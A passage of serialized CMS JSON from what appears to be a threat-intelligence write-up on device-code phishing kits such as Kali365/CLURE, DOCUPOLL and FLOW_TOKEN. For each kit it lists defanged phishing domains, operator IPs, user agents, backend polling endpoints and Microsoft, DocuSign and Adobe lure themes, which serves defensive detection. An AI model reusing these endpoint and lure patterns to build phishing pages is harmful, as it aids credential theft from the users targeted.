",{"data":14012,"content":14013,"nodeType":860},{},[14014],{"data":14015,"marks":14016,"value":14017,"nodeType":864},{},[],"/api/init /api/generate-code ",{"data":14019,"content":14020,"nodeType":860},{},[14021],{"data":14022,"marks":14023,"value":14024,"nodeType":864},{},[],"/api/check-auth",{"data":14026,"content":14027,"nodeType":4581},{},[14028,14039],{"data":14029,"content":14030,"nodeType":4569},{},[14031],{"data":14032,"content":14033,"nodeType":860},{},[14034],{"data":14035,"marks":14036,"value":14038,"nodeType":864},{},[14037],{"type":899},"Lure themes",{"data":14040,"content":14041,"nodeType":4569},{},[14042],{"data":14043,"content":14044,"nodeType":860},{},[14045],{"data":14046,"marks":14047,"value":14048,"nodeType":864},{},[],"Various MS lures (e.g. Outlook, SharePoint, Teams) DocuSign, Adobe",{"data":14050,"content":14051,"nodeType":4581},{},[14052,14063],{"data":14053,"content":14054,"nodeType":4569},{},[14055],{"data":14056,"content":14057,"nodeType":860},{},[14058],{"data":14059,"marks":14060,"value":14062,"nodeType":864},{},[14061],{"type":899},"Example Domain",{"data":14064,"content":14065,"nodeType":4569},{},[14066,14078,14090,14102,14114],{"data":14067,"content":14068,"nodeType":860},{},[14069,14074],{"data":14070,"marks":14071,"value":14073,"nodeType":864},{},[14072],{"type":899},"Precursor A:",{"data":14075,"marks":14076,"value":14077,"nodeType":864},{},[]," teams-zpfvwnpxuc[.]edgeone.dev",{"data":14079,"content":14080,"nodeType":860},{},[14081,14086],{"data":14082,"marks":14083,"value":14085,"nodeType":864},{},[14084],{"type":899},"Precursor B: ",{"data":14087,"marks":14088,"value":14089,"nodeType":864},{},[],"authenticate-m365-accountsecurity-m-pi[.]vercel.app",{"data":14091,"content":14092,"nodeType":860},{},[14093,14098],{"data":14094,"marks":14095,"value":14097,"nodeType":864},{},[14096],{"type":899},"Courts Access: ",{"data":14099,"marks":14100,"value":14101,"nodeType":864},{},[],"secure-systems-validations-courts[.]vercel.app",{"data":14103,"content":14104,"nodeType":860},{},[14105,14110],{"data":14106,"marks":14107,"value":14109,"nodeType":864},{},[14108],{"type":899},"Early ANTIBOT:",{"data":14111,"marks":14112,"value":14113,"nodeType":864},{},[]," interface-auth-en-useast[.]global.ssl.fastly.net",{"data":14115,"content":14116,"nodeType":860},{},[14117,14122],{"data":14118,"marks":14119,"value":14121,"nodeType":864},{},[14120],{"type":899},"Production ANTIBOT: ",{"data":14123,"marks":14124,"value":14125,"nodeType":864},{},[],"index-z059-document-pending-reviewsign-xlss7994824[.]awalizer[.]workers.dev",{"data":14127,"content":14128,"nodeType":1005},{},[],{"data":14130,"content":14131,"nodeType":1312},{},[14132],{"data":14133,"marks":14134,"value":14136,"nodeType":864},{},[14135],{"type":899},"“SHAREFILE”",{"data":14138,"content":14139,"nodeType":4845},{},[14140,14163,14202,14225,14248],{"data":14141,"content":14142,"nodeType":4581},{},[14143,14153],{"data":14144,"content":14145,"nodeType":4569},{},[14146],{"data":14147,"content":14148,"nodeType":860},{},[14149],{"data":14150,"marks":14151,"value":13879,"nodeType":864},{},[14152],{"type":899},{"data":14154,"content":14155,"nodeType":4569},{},[14156],{"data":14157,"content":14158,"nodeType":860},{},[14159],{"data":14160,"marks":14161,"value":14162,"nodeType":864},{},[],"No hosting markers visible.",{"data":14164,"content":14165,"nodeType":4581},{},[14166,14176],{"data":14167,"content":14168,"nodeType":4569},{},[14169],{"data":14170,"content":14171,"nodeType":860},{},[14172],{"data":14173,"marks":14174,"value":13903,"nodeType":864},{},[14175],{"type":899},{"data":14177,"content":14178,"nodeType":4569},{},[14179,14191],{"data":14180,"content":14181,"nodeType":860},{},[14182,14187],{"data":14183,"marks":14184,"value":14186,"nodeType":864},{},[14185],{"type":899},"Example IP:",{"data":14188,"marks":14189,"value":14190,"nodeType":864},{},[]," 147.45.60.47 (Global Connectivity Solutions LLP AS215540)",{"data":14192,"content":14193,"nodeType":860},{},[14194,14198],{"data":14195,"marks":14196,"value":13944,"nodeType":864},{},[14197],{"type":899},{"data":14199,"marks":14200,"value":14201,"nodeType":864},{},[]," node",{"data":14203,"content":14204,"nodeType":4581},{},[14205,14215],{"data":14206,"content":14207,"nodeType":4569},{},[14208],{"data":14209,"content":14210,"nodeType":860},{},[14211],{"data":14212,"marks":14213,"value":13986,"nodeType":864},{},[14214],{"type":899},{"data":14216,"content":14217,"nodeType":4569},{},[14218],{"data":14219,"content":14220,"nodeType":860},{},[14221],{"data":14222,"marks":14223,"value":14224,"nodeType":864},{},[],"POST /api/device/start  POST /api/device/poll",{"data":14226,"content":14227,"nodeType":4581},{},[14228,14238],{"data":14229,"content":14230,"nodeType":4569},{},[14231],{"data":14232,"content":14233,"nodeType":860},{},[14234],{"data":14235,"marks":14236,"value":14038,"nodeType":864},{},[14237],{"type":899},{"data":14239,"content":14240,"nodeType":4569},{},[14241],{"data":14242,"content":14243,"nodeType":860},{},[14244],{"data":14245,"marks":14246,"value":14247,"nodeType":864},{},[],"Citrix ShareFile document transfer — file card with sender info, expiry warning, download/preview buttons",{"data":14249,"content":14250,"nodeType":4581},{},[14251,14262],{"data":14252,"content":14253,"nodeType":4569},{},[14254],{"data":14255,"content":14256,"nodeType":860},{},[14257],{"data":14258,"marks":14259,"value":14261,"nodeType":864},{},[14260],{"type":899},"Example domain",{"data":14263,"content":14264,"nodeType":4569},{},[14265],{"data":14266,"content":14267,"nodeType":860},{},[14268],{"data":14269,"marks":14270,"value":14271,"nodeType":864},{},[],"cghdfg[.]vbchkioi[.]su",{"data":14273,"content":14277,"nodeType":996},{"target":14274},{"sys":14275},{"id":14276,"type":1001,"linkType":1002},"1TtZ6VsMSTlPvy7W996w9E",[],{"data":14279,"content":14280,"nodeType":1005},{},[],{"data":14282,"content":14283,"nodeType":1312},{},[14284],{"data":14285,"marks":14286,"value":14288,"nodeType":864},{},[14287],{"type":899},"Kali365 (internal name “CLURE”)",{"data":14290,"content":14291,"nodeType":860},{},[14292,14296,14301,14305,14313,14317,14325],{"data":14293,"marks":14294,"value":14295,"nodeType":864},{},[],"Clure was recently linked to the ",{"data":14297,"marks":14298,"value":14300,"nodeType":864},{},[14299],{"type":899},"Kali365",{"data":14302,"marks":14303,"value":14304,"nodeType":864},{},[]," PhaaS platform based on an ",{"data":14306,"content":14308,"nodeType":883},{"uri":14307},"https://www.ic3.gov/PSA/2026/PSA260521",[14309],{"data":14310,"marks":14311,"value":14312,"nodeType":864},{},[],"FBI advisory",{"data":14314,"marks":14315,"value":14316,"nodeType":864},{},[]," and additional research from ",{"data":14318,"content":14320,"nodeType":883},{"uri":14319},"https://arcticwolf.com/resources/blog/token-bingo-dont-let-your-code-be-the-winner/",[14321],{"data":14322,"marks":14323,"value":14324,"nodeType":864},{},[],"Arctic Wolf",{"data":14326,"marks":14327,"value":14328,"nodeType":864},{},[],". This is yet another example of Device Code Phishing and AiTM phishing capabilities being integrated into unified phishing platforms. ",{"data":14330,"content":14331,"nodeType":4845},{},[14332,14355,14394,14417,14440],{"data":14333,"content":14334,"nodeType":4581},{},[14335,14345],{"data":14336,"content":14337,"nodeType":4569},{},[14338],{"data":14339,"content":14340,"nodeType":860},{},[14341],{"data":14342,"marks":14343,"value":13879,"nodeType":864},{},[14344],{"type":899},{"data":14346,"content":14347,"nodeType":4569},{},[14348],{"data":14349,"content":14350,"nodeType":860},{},[14351],{"data":14352,"marks":14353,"value":14354,"nodeType":864},{},[],"API on api.duemineral.uk:8443 and api.loadingdocuments.uk:8443 (rotates). ",{"data":14356,"content":14357,"nodeType":4581},{},[14358,14368],{"data":14359,"content":14360,"nodeType":4569},{},[14361],{"data":14362,"content":14363,"nodeType":860},{},[14364],{"data":14365,"marks":14366,"value":13903,"nodeType":864},{},[14367],{"type":899},{"data":14369,"content":14370,"nodeType":4569},{},[14371,14383],{"data":14372,"content":14373,"nodeType":860},{},[14374,14379],{"data":14375,"marks":14376,"value":14378,"nodeType":864},{},[14377],{"type":899},"Example IP: ",{"data":14380,"marks":14381,"value":14382,"nodeType":864},{},[],"162.243.166.119 (DigitalOcean AS14061)",{"data":14384,"content":14385,"nodeType":860},{},[14386,14390],{"data":14387,"marks":14388,"value":13944,"nodeType":864},{},[14389],{"type":899},{"data":14391,"marks":14392,"value":14393,"nodeType":864},{},[]," python-requests/2.32.5",{"data":14395,"content":14396,"nodeType":4581},{},[14397,14407],{"data":14398,"content":14399,"nodeType":4569},{},[14400],{"data":14401,"content":14402,"nodeType":860},{},[14403],{"data":14404,"marks":14405,"value":13986,"nodeType":864},{},[14406],{"type":899},{"data":14408,"content":14409,"nodeType":4569},{},[14410],{"data":14411,"content":14412,"nodeType":860},{},[14413],{"data":14414,"marks":14415,"value":14416,"nodeType":864},{},[],"GET /api/status/{numeric_SID} (port :8443)",{"data":14418,"content":14419,"nodeType":4581},{},[14420,14430],{"data":14421,"content":14422,"nodeType":4569},{},[14423],{"data":14424,"content":14425,"nodeType":860},{},[14426],{"data":14427,"marks":14428,"value":14038,"nodeType":864},{},[14429],{"type":899},{"data":14431,"content":14432,"nodeType":4569},{},[14433],{"data":14434,"content":14435,"nodeType":860},{},[14436],{"data":14437,"marks":14438,"value":14439,"nodeType":864},{},[],"SharePoint \"Team Site\" doc library, SharePoint \"Shared Document\" individual share",{"data":14441,"content":14442,"nodeType":4581},{},[14443,14453],{"data":14444,"content":14445,"nodeType":4569},{},[14446],{"data":14447,"content":14448,"nodeType":860},{},[14449],{"data":14450,"marks":14451,"value":14261,"nodeType":864},{},[14452],{"type":899},{"data":14454,"content":14455,"nodeType":4569},{},[14456],{"data":14457,"content":14458,"nodeType":860},{},[14459],{"data":14460,"marks":14461,"value":14462,"nodeType":864},{},[],"auth[.]duemineral[.]uk",{"data":14464,"content":14468,"nodeType":996},{"target":14465},{"sys":14466},{"id":14467,"type":1001,"linkType":1002},"Y1AiT3dJRTXz64pb68kca",[],{"data":14470,"content":14471,"nodeType":1005},{},[],{"data":14473,"content":14474,"nodeType":1312},{},[14475],{"data":14476,"marks":14477,"value":14479,"nodeType":864},{},[14478],{"type":899},"“LINKID”",{"data":14481,"content":14482,"nodeType":4845},{},[14483,14506,14551,14581,14604],{"data":14484,"content":14485,"nodeType":4581},{},[14486,14496],{"data":14487,"content":14488,"nodeType":4569},{},[14489],{"data":14490,"content":14491,"nodeType":860},{},[14492],{"data":14493,"marks":14494,"value":13879,"nodeType":864},{},[14495],{"type":899},{"data":14497,"content":14498,"nodeType":4569},{},[14499],{"data":14500,"content":14501,"nodeType":860},{},[14502],{"data":14503,"marks":14504,"value":14505,"nodeType":864},{},[],"Adobe variant has Cloudflare challenge-platform iframe (CF-protected origin). Relative API paths — self-hosted.",{"data":14507,"content":14508,"nodeType":4581},{},[14509,14519],{"data":14510,"content":14511,"nodeType":4569},{},[14512],{"data":14513,"content":14514,"nodeType":860},{},[14515],{"data":14516,"marks":14517,"value":13903,"nodeType":864},{},[14518],{"type":899},{"data":14520,"content":14521,"nodeType":4569},{},[14522,14533,14540],{"data":14523,"content":14524,"nodeType":860},{},[14525,14529],{"data":14526,"marks":14527,"value":14378,"nodeType":864},{},[14528],{"type":899},{"data":14530,"marks":14531,"value":14532,"nodeType":864},{},[],"185.176.220.22 (2cloud.eu AS39845)",{"data":14534,"content":14535,"nodeType":860},{},[14536],{"data":14537,"marks":14538,"value":14539,"nodeType":864},{},[],"2600:1f10:470d:9a00:1437:ec30:be61:3494 (AWS AS16509)",{"data":14541,"content":14542,"nodeType":860},{},[14543,14547],{"data":14544,"marks":14545,"value":13944,"nodeType":864},{},[14546],{"type":899},{"data":14548,"marks":14549,"value":14550,"nodeType":864},{},[]," axios/1.10.0 , axios/1.13.6",{"data":14552,"content":14553,"nodeType":4581},{},[14554,14564],{"data":14555,"content":14556,"nodeType":4569},{},[14557],{"data":14558,"content":14559,"nodeType":860},{},[14560],{"data":14561,"marks":14562,"value":13986,"nodeType":864},{},[14563],{"type":899},{"data":14565,"content":14566,"nodeType":4569},{},[14567,14574],{"data":14568,"content":14569,"nodeType":860},{},[14570],{"data":14571,"marks":14572,"value":14573,"nodeType":864},{},[],"POST /api/device/start",{"data":14575,"content":14576,"nodeType":860},{},[14577],{"data":14578,"marks":14579,"value":14580,"nodeType":864},{},[],"GET /api/device/status/{sessionId}",{"data":14582,"content":14583,"nodeType":4581},{},[14584,14594],{"data":14585,"content":14586,"nodeType":4569},{},[14587],{"data":14588,"content":14589,"nodeType":860},{},[14590],{"data":14591,"marks":14592,"value":14038,"nodeType":864},{},[14593],{"type":899},{"data":14595,"content":14596,"nodeType":4569},{},[14597],{"data":14598,"content":14599,"nodeType":860},{},[14600],{"data":14601,"marks":14602,"value":14603,"nodeType":864},{},[],"MS Teams meeting invitation (with interactive date/time picker), Adobe Acrobat Sign document review",{"data":14605,"content":14606,"nodeType":4581},{},[14607,14617],{"data":14608,"content":14609,"nodeType":4569},{},[14610],{"data":14611,"content":14612,"nodeType":860},{},[14613],{"data":14614,"marks":14615,"value":14261,"nodeType":864},{},[14616],{"type":899},{"data":14618,"content":14619,"nodeType":4569},{},[14620],{"data":14621,"content":14622,"nodeType":860},{},[14623],{"data":14624,"marks":14625,"value":14626,"nodeType":864},{},[],"sdtr-site[.]cfd",{"data":14628,"content":14632,"nodeType":996},{"target":14629},{"sys":14630},{"id":14631,"type":1001,"linkType":1002},"22hsIzlkptC2JTIUtbOuUn",[],{"data":14634,"content":14635,"nodeType":1005},{},[],{"data":14637,"content":14638,"nodeType":1312},{},[14639],{"data":14640,"marks":14641,"value":14643,"nodeType":864},{},[14642],{"type":899},"Device Code Lab (formerly codename \"AUTHOV”)",{"data":14645,"content":14649,"nodeType":996},{"target":14646},{"sys":14647},{"id":14648,"type":1001,"linkType":1002},"5vllVaa0Ry0wKs46ssrZLC",[],{"data":14651,"content":14652,"nodeType":4845},{},[14653,14676,14722,14745,14768],{"data":14654,"content":14655,"nodeType":4581},{},[14656,14666],{"data":14657,"content":14658,"nodeType":4569},{},[14659],{"data":14660,"content":14661,"nodeType":860},{},[14662],{"data":14663,"marks":14664,"value":13879,"nodeType":864},{},[14665],{"type":899},{"data":14667,"content":14668,"nodeType":4569},{},[14669],{"data":14670,"content":14671,"nodeType":860},{},[14672],{"data":14673,"marks":14674,"value":14675,"nodeType":864},{},[],"workers.dev",{"data":14677,"content":14678,"nodeType":4581},{},[14679,14689],{"data":14680,"content":14681,"nodeType":4569},{},[14682],{"data":14683,"content":14684,"nodeType":860},{},[14685],{"data":14686,"marks":14687,"value":13903,"nodeType":864},{},[14688],{"type":899},{"data":14690,"content":14691,"nodeType":4569},{},[14692,14703],{"data":14693,"content":14694,"nodeType":860},{},[14695,14699],{"data":14696,"marks":14697,"value":14378,"nodeType":864},{},[14698],{"type":899},{"data":14700,"marks":14701,"value":14702,"nodeType":864},{},[],"192.3.225.100 (HostPapa / ColoCrossing AS36352)",{"data":14704,"content":14705,"nodeType":860},{},[14706,14710,14713,14718],{"data":14707,"marks":14708,"value":13944,"nodeType":864},{},[14709],{"type":899},{"data":14711,"marks":14712,"value":1171,"nodeType":864},{},[],{"data":14714,"marks":14715,"value":14717,"nodeType":864},{},[14716],{"type":899}," ",{"data":14719,"marks":14720,"value":14721,"nodeType":864},{},[],"python-httpx/0.28.1",{"data":14723,"content":14724,"nodeType":4581},{},[14725,14735],{"data":14726,"content":14727,"nodeType":4569},{},[14728],{"data":14729,"content":14730,"nodeType":860},{},[14731],{"data":14732,"marks":14733,"value":13986,"nodeType":864},{},[14734],{"type":899},{"data":14736,"content":14737,"nodeType":4569},{},[14738],{"data":14739,"content":14740,"nodeType":860},{},[14741],{"data":14742,"marks":14743,"value":14744,"nodeType":864},{},[],"GET /landing/api/session-status?session_id=&token=",{"data":14746,"content":14747,"nodeType":4581},{},[14748,14758],{"data":14749,"content":14750,"nodeType":4569},{},[14751],{"data":14752,"content":14753,"nodeType":860},{},[14754],{"data":14755,"marks":14756,"value":14038,"nodeType":864},{},[14757],{"type":899},{"data":14759,"content":14760,"nodeType":4569},{},[14761],{"data":14762,"content":14763,"nodeType":860},{},[14764],{"data":14765,"marks":14766,"value":14767,"nodeType":864},{},[],"Adobe Acrobat document sharing (PDF preview, sender avatar)",{"data":14769,"content":14770,"nodeType":4581},{},[14771,14781],{"data":14772,"content":14773,"nodeType":4569},{},[14774],{"data":14775,"content":14776,"nodeType":860},{},[14777],{"data":14778,"marks":14779,"value":14261,"nodeType":864},{},[14780],{"type":899},{"data":14782,"content":14783,"nodeType":4569},{},[14784],{"data":14785,"content":14786,"nodeType":860},{},[14787],{"data":14788,"marks":14789,"value":14790,"nodeType":864},{},[],"milosh-solibella-0dcio[.]sgttommy.workers.dev",{"data":14792,"content":14796,"nodeType":996},{"target":14793},{"sys":14794},{"id":14795,"type":1001,"linkType":1002},"6szO6IKJ32usyxIKX1efZy",[],{"data":14798,"content":14802,"nodeType":996},{"target":14799},{"sys":14800},{"id":14801,"type":1001,"linkType":1002},"lEqV3RTMIY8y011lnhX7P",[],{"data":14804,"content":14805,"nodeType":1005},{},[],{"data":14807,"content":14808,"nodeType":1312},{},[14809],{"data":14810,"marks":14811,"value":14813,"nodeType":864},{},[14812],{"type":899},"“DOCUPOLL”",{"data":14815,"content":14816,"nodeType":4845},{},[14817,14840,14878,14915,14938],{"data":14818,"content":14819,"nodeType":4581},{},[14820,14830],{"data":14821,"content":14822,"nodeType":4569},{},[14823],{"data":14824,"content":14825,"nodeType":860},{},[14826],{"data":14827,"marks":14828,"value":13879,"nodeType":864},{},[14829],{"type":899},{"data":14831,"content":14832,"nodeType":4569},{},[14833],{"data":14834,"content":14835,"nodeType":860},{},[14836],{"data":14837,"marks":14838,"value":14839,"nodeType":864},{},[],"Github.io and workers.dev hosting",{"data":14841,"content":14842,"nodeType":4581},{},[14843,14853],{"data":14844,"content":14845,"nodeType":4569},{},[14846],{"data":14847,"content":14848,"nodeType":860},{},[14849],{"data":14850,"marks":14851,"value":13903,"nodeType":864},{},[14852],{"type":899},{"data":14854,"content":14855,"nodeType":4569},{},[14856,14867],{"data":14857,"content":14858,"nodeType":860},{},[14859,14863],{"data":14860,"marks":14861,"value":14378,"nodeType":864},{},[14862],{"type":899},{"data":14864,"marks":14865,"value":14866,"nodeType":864},{},[],"144.172.103.240 (FranTech Solutions / RouterHosting / Cloudzy AS14956)",{"data":14868,"content":14869,"nodeType":860},{},[14870,14874],{"data":14871,"marks":14872,"value":13944,"nodeType":864},{},[14873],{"type":899},{"data":14875,"marks":14876,"value":14877,"nodeType":864},{},[]," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19042",{"data":14879,"content":14880,"nodeType":4581},{},[14881,14891],{"data":14882,"content":14883,"nodeType":4569},{},[14884],{"data":14885,"content":14886,"nodeType":860},{},[14887],{"data":14888,"marks":14889,"value":13986,"nodeType":864},{},[14890],{"type":899},{"data":14892,"content":14893,"nodeType":4569},{},[14894,14901,14908],{"data":14895,"content":14896,"nodeType":860},{},[14897],{"data":14898,"marks":14899,"value":14900,"nodeType":864},{},[],"POST /api/v1/landing-pages/public/{slug}/init",{"data":14902,"content":14903,"nodeType":860},{},[14904],{"data":14905,"marks":14906,"value":14907,"nodeType":864},{},[],"POST .../poll",{"data":14909,"content":14910,"nodeType":860},{},[14911],{"data":14912,"marks":14913,"value":14914,"nodeType":864},{},[],"POST .../track",{"data":14916,"content":14917,"nodeType":4581},{},[14918,14928],{"data":14919,"content":14920,"nodeType":4569},{},[14921],{"data":14922,"content":14923,"nodeType":860},{},[14924],{"data":14925,"marks":14926,"value":14038,"nodeType":864},{},[14927],{"type":899},{"data":14929,"content":14930,"nodeType":4569},{},[14931],{"data":14932,"content":14933,"nodeType":860},{},[14934],{"data":14935,"marks":14936,"value":14937,"nodeType":864},{},[],"DocuSign document signing. One sample is a full scrape of real docusign.com (free-account page) with kit injected.",{"data":14939,"content":14940,"nodeType":4581},{},[14941,14951],{"data":14942,"content":14943,"nodeType":4569},{},[14944],{"data":14945,"content":14946,"nodeType":860},{},[14947],{"data":14948,"marks":14949,"value":14261,"nodeType":864},{},[14950],{"type":899},{"data":14952,"content":14953,"nodeType":4569},{},[14954],{"data":14955,"content":14956,"nodeType":860},{},[14957],{"data":14958,"marks":14959,"value":14960,"nodeType":864},{},[],"docufirmar[.]github.io",{"data":14962,"content":14966,"nodeType":996},{"target":14963},{"sys":14964},{"id":14965,"type":1001,"linkType":1002},"6Y1XABHnQD82R3MW80HnQZ",[],{"data":14968,"content":14969,"nodeType":1005},{},[],{"data":14971,"content":14972,"nodeType":1312},{},[14973],{"data":14974,"marks":14975,"value":14977,"nodeType":864},{},[14976],{"type":899},"“FLOW_TOKEN”",{"data":14979,"content":14980,"nodeType":4845},{},[14981,15003,15048,15078,15101],{"data":14982,"content":14983,"nodeType":4581},{},[14984,14994],{"data":14985,"content":14986,"nodeType":4569},{},[14987],{"data":14988,"content":14989,"nodeType":860},{},[14990],{"data":14991,"marks":14992,"value":13879,"nodeType":864},{},[14993],{"type":899},{"data":14995,"content":14996,"nodeType":4569},{},[14997],{"data":14998,"content":14999,"nodeType":860},{},[15000],{"data":15001,"marks":15002,"value":14675,"nodeType":864},{},[],{"data":15004,"content":15005,"nodeType":4581},{},[15006,15016],{"data":15007,"content":15008,"nodeType":4569},{},[15009],{"data":15010,"content":15011,"nodeType":860},{},[15012],{"data":15013,"marks":15014,"value":13903,"nodeType":864},{},[15015],{"type":899},{"data":15017,"content":15018,"nodeType":4569},{},[15019,15030],{"data":15020,"content":15021,"nodeType":860},{},[15022,15026],{"data":15023,"marks":15024,"value":14378,"nodeType":864},{},[15025],{"type":899},{"data":15027,"marks":15028,"value":15029,"nodeType":864},{},[],"43.166.163.163 (Tencent Cloud AS132203)",{"data":15031,"content":15032,"nodeType":860},{},[15033,15037,15040,15044],{"data":15034,"marks":15035,"value":13944,"nodeType":864},{},[15036],{"type":899},{"data":15038,"marks":15039,"value":1171,"nodeType":864},{},[],{"data":15041,"marks":15042,"value":14717,"nodeType":864},{},[15043],{"type":899},{"data":15045,"marks":15046,"value":15047,"nodeType":864},{},[],"(null)",{"data":15049,"content":15050,"nodeType":4581},{},[15051,15061],{"data":15052,"content":15053,"nodeType":4569},{},[15054],{"data":15055,"content":15056,"nodeType":860},{},[15057],{"data":15058,"marks":15059,"value":13986,"nodeType":864},{},[15060],{"type":899},{"data":15062,"content":15063,"nodeType":4569},{},[15064,15071],{"data":15065,"content":15066,"nodeType":860},{},[15067],{"data":15068,"marks":15069,"value":15070,"nodeType":864},{},[],"POST /api/handler.php ",{"data":15072,"content":15073,"nodeType":860},{},[15074],{"data":15075,"marks":15076,"value":15077,"nodeType":864},{},[],"(actions: device_code_generate, device_code_poll_public)",{"data":15079,"content":15080,"nodeType":4581},{},[15081,15091],{"data":15082,"content":15083,"nodeType":4569},{},[15084],{"data":15085,"content":15086,"nodeType":860},{},[15087],{"data":15088,"marks":15089,"value":14038,"nodeType":864},{},[15090],{"type":899},{"data":15092,"content":15093,"nodeType":4569},{},[15094],{"data":15095,"content":15096,"nodeType":860},{},[15097],{"data":15098,"marks":15099,"value":15100,"nodeType":864},{},[],"DocuSign \"Salary Adjustment Document — 2026\", Microsoft banner · HR Department sender",{"data":15102,"content":15103,"nodeType":4581},{},[15104,15114],{"data":15105,"content":15106,"nodeType":4569},{},[15107],{"data":15108,"content":15109,"nodeType":860},{},[15110],{"data":15111,"marks":15112,"value":14261,"nodeType":864},{},[15113],{"type":899},{"data":15115,"content":15116,"nodeType":4569},{},[15117],{"data":15118,"content":15119,"nodeType":860},{},[15120],{"data":15121,"marks":15122,"value":15123,"nodeType":864},{},[],"salaryadjustment-2afb52.pmb6fefc52b3f9aa5c2dbf[.]workers.dev",{"data":15125,"content":15129,"nodeType":996},{"target":15126},{"sys":15127},{"id":15128,"type":1001,"linkType":1002},"6xiTDHStbiJh7LMhjAZcPd",[],{"data":15131,"content":15132,"nodeType":1005},{},[],{"data":15134,"content":15135,"nodeType":1312},{},[15136],{"data":15137,"marks":15138,"value":15140,"nodeType":864},{},[15139],{"type":899},"“PAPRIKA”",{"data":15142,"content":15143,"nodeType":4845},{},[15144,15167,15190,15213],{"data":15145,"content":15146,"nodeType":4581},{},[15147,15157],{"data":15148,"content":15149,"nodeType":4569},{},[15150],{"data":15151,"content":15152,"nodeType":860},{},[15153],{"data":15154,"marks":15155,"value":13879,"nodeType":864},{},[15156],{"type":899},{"data":15158,"content":15159,"nodeType":4569},{},[15160],{"data":15161,"content":15162,"nodeType":860},{},[15163],{"data":15164,"marks":15165,"value":15166,"nodeType":864},{},[],"AWS S3 hosting",{"data":15168,"content":15169,"nodeType":4581},{},[15170,15180],{"data":15171,"content":15172,"nodeType":4569},{},[15173],{"data":15174,"content":15175,"nodeType":860},{},[15176],{"data":15177,"marks":15178,"value":13986,"nodeType":864},{},[15179],{"type":899},{"data":15181,"content":15182,"nodeType":4569},{},[15183],{"data":15184,"content":15185,"nodeType":860},{},[15186],{"data":15187,"marks":15188,"value":15189,"nodeType":864},{},[],"POST /api/v1/loader",{"data":15191,"content":15192,"nodeType":4581},{},[15193,15203],{"data":15194,"content":15195,"nodeType":4569},{},[15196],{"data":15197,"content":15198,"nodeType":860},{},[15199],{"data":15200,"marks":15201,"value":14038,"nodeType":864},{},[15202],{"type":899},{"data":15204,"content":15205,"nodeType":4569},{},[15206],{"data":15207,"content":15208,"nodeType":860},{},[15209],{"data":15210,"marks":15211,"value":15212,"nodeType":864},{},[],"MS login clone (\"Sign in to your account\"), \"Office 365\" branding, fake \"Powered by Okta\" footer",{"data":15214,"content":15215,"nodeType":4581},{},[15216,15226],{"data":15217,"content":15218,"nodeType":4569},{},[15219],{"data":15220,"content":15221,"nodeType":860},{},[15222],{"data":15223,"marks":15224,"value":14261,"nodeType":864},{},[15225],{"type":899},{"data":15227,"content":15228,"nodeType":4569},{},[15229],{"data":15230,"content":15231,"nodeType":860},{},[15232],{"data":15233,"marks":15234,"value":15235,"nodeType":864},{},[],"redirect-523346-d95027ec[.]s3.amazonaws.com",{"data":15237,"content":15241,"nodeType":996},{"target":15238},{"sys":15239},{"id":15240,"type":1001,"linkType":1002},"6WFXqUDzcJHKWSwVIcDZAf",[],{"data":15243,"content":15244,"nodeType":1005},{},[],{"data":15246,"content":15247,"nodeType":1312},{},[15248],{"data":15249,"marks":15250,"value":15252,"nodeType":864},{},[15251],{"type":899},"“DCSTATUS”",{"data":15254,"content":15255,"nodeType":4845},{},[15256,15278,15301,15324],{"data":15257,"content":15258,"nodeType":4581},{},[15259,15269],{"data":15260,"content":15261,"nodeType":4569},{},[15262],{"data":15263,"content":15264,"nodeType":860},{},[15265],{"data":15266,"marks":15267,"value":13879,"nodeType":864},{},[15268],{"type":899},{"data":15270,"content":15271,"nodeType":4569},{},[15272],{"data":15273,"content":15274,"nodeType":860},{},[15275],{"data":15276,"marks":15277,"value":14162,"nodeType":864},{},[],{"data":15279,"content":15280,"nodeType":4581},{},[15281,15291],{"data":15282,"content":15283,"nodeType":4569},{},[15284],{"data":15285,"content":15286,"nodeType":860},{},[15287],{"data":15288,"marks":15289,"value":13986,"nodeType":864},{},[15290],{"type":899},{"data":15292,"content":15293,"nodeType":4569},{},[15294],{"data":15295,"content":15296,"nodeType":860},{},[15297],{"data":15298,"marks":15299,"value":15300,"nodeType":864},{},[],"GET /dc/status/{base64url_sid}",{"data":15302,"content":15303,"nodeType":4581},{},[15304,15314],{"data":15305,"content":15306,"nodeType":4569},{},[15307],{"data":15308,"content":15309,"nodeType":860},{},[15310],{"data":15311,"marks":15312,"value":14038,"nodeType":864},{},[15313],{"type":899},{"data":15315,"content":15316,"nodeType":4569},{},[15317],{"data":15318,"content":15319,"nodeType":860},{},[15320],{"data":15321,"marks":15322,"value":15323,"nodeType":864},{},[],"Generic \"Microsoft 365 - Secure Access\" verification page",{"data":15325,"content":15326,"nodeType":4581},{},[15327,15337],{"data":15328,"content":15329,"nodeType":4569},{},[15330],{"data":15331,"content":15332,"nodeType":860},{},[15333],{"data":15334,"marks":15335,"value":14261,"nodeType":864},{},[15336],{"type":899},{"data":15338,"content":15339,"nodeType":4569},{},[15340],{"data":15341,"content":15342,"nodeType":860},{},[15343],{"data":15344,"marks":15345,"value":15346,"nodeType":864},{},[],"owa[.]apmmacleans[.]ca",{"data":15348,"content":15352,"nodeType":996},{"target":15349},{"sys":15350},{"id":15351,"type":1001,"linkType":1002},"ugYhHeXY1lQdKooALmrIs",[],{"data":15354,"content":15355,"nodeType":1005},{},[],{"data":15357,"content":15358,"nodeType":1312},{},[15359],{"data":15360,"marks":15361,"value":15363,"nodeType":864},{},[15362],{"type":899},"“DOLCE”",{"data":15365,"content":15369,"nodeType":996},{"target":15366},{"sys":15367},{"id":15368,"type":1001,"linkType":1002},"7TzU6kk01Un45NB0buEz2",[],{"data":15371,"content":15372,"nodeType":4845},{},[15373,15396,15434,15457,15480],{"data":15374,"content":15375,"nodeType":4581},{},[15376,15386],{"data":15377,"content":15378,"nodeType":4569},{},[15379],{"data":15380,"content":15381,"nodeType":860},{},[15382],{"data":15383,"marks":15384,"value":13879,"nodeType":864},{},[15385],{"type":899},{"data":15387,"content":15388,"nodeType":4569},{},[15389],{"data":15390,"content":15391,"nodeType":860},{},[15392],{"data":15393,"marks":15394,"value":15395,"nodeType":864},{},[],"Microsoft PowerApps 